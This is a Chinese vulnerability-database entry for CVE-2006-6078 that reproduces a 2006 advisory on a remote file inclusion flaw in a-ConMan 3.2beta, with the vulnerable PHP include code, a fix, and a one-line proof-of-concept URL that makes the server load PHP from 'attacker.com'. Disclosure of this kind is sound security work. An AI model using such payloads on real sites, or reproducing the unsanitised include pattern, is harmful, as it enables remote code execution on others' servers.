A-Conman Common.Inc.PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111638 漏洞类型 输入验证
发布时间 2006-11-22 更新时间 2006-11-30
CVE编号 CVE-2006-6078 CNNVD-ID CNNVD-200611-393
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2831
https://cxsecurity.com/issue/WLB-2006110111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-393
|漏洞详情
a-ConMan的common.inc.php中存在PHP远程文件包含漏洞,远程攻击者通过cm_basedir参数中的URL执行任意PHP代码。
|漏洞EXP
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_61$2006

------------------------------------------------------------------------------
[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion
------------------------------------------------------------------------------

Author		: Ahmad Maulana a.k.a Matdhule
Date Found	: November, 22nd 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv61-matdhule-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a-ConMan (Automated Content Management)

Application	: a-ConMan (Automated Content Management)
version		: 3.2beta
URL		: http://sourceforge.net/projects/a-conman

a-ConMan is a flexible database solution built to categorize and manage your image and video content. Giving you the ability to automate the building and updating for any type of content specific website within seconds. Utilizing one of the most advanced

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found vulnerability at script common.inc.php

-----------------------common.inc.php----------------------
....
<?php
include_once($cm_basedir."/ez_sql.php");
include_once($cm_basedir."/pg2ezsql.php");
// include_once($cm_basedir."/functions.php");
$ver = "3.1.1228";

...
----------------------------------------------------------

Input passed to the "cm_basedir" parameter in common.inc.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?


Solution:
~~~~~~~
- Sanitize variable $cm_basedir on common.inc.php.

---------------------------------------------------------------------------
Shoutz:
~~~
~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson    :)   
~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke
~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ Solpotcrew Comunity (#nyubicrew @ allindo.net), #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-11-22]
|参考资料

来源:BID
名称:21255
链接:http://www.securityfocus.com/bid/21255
来源:BUGTRAQ
名称:20061123[ECHO_ADV_61_2006]a-ConMan<=v3.2betaRemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/452433/100/0/threaded
来源:MILW0RM
名称:2831
链接:http://www.milw0rm.com/exploits/2831
来源:VUPEN
名称:ADV-2006-4705
链接:http://www.frsirt.com/english/advisories/2006/4705
来源:SECTRACK
名称:1017278
链接:http://securitytracker.com/id?1017278
来源:MISC
链接:http://advisories.echo.or.id/adv/adv61-matdhule-2006.txt
来源:SREASON
名称:1909
链接:http://securityreason.com/securityalert/1909
来源:MILW0RM
名称:2831
链接:http://milw0rm.com/exploits/2831